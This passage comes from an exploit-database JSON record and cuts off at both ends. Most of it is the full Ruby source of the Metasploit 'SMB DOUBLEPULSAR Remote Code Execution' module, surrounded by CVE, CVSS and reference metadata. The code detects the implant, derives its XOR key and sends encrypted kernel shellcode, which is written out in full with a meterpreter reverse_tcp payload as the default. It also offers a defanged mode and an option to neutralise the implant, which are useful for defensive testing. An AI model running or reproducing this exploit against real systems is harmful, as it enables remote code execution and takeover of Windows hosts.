["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": 
["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-12T17:48:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-12T17:48:41", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 
'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n 
return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" 
\\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-12T17:48:41", "differentElements": ["sourceData"], "edition": 68}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "2af769d2f0f395f48de4732f348253ce", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-14T09:51:16", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703", "SMNTC-96706"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-12T17:48:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-12T17:48:41", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": ""}, "lastseen": "2021-11-14T09:51:16", "differentElements": ["sourceData"], "edition": 69}], "viewCount": 115, 
"enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": 
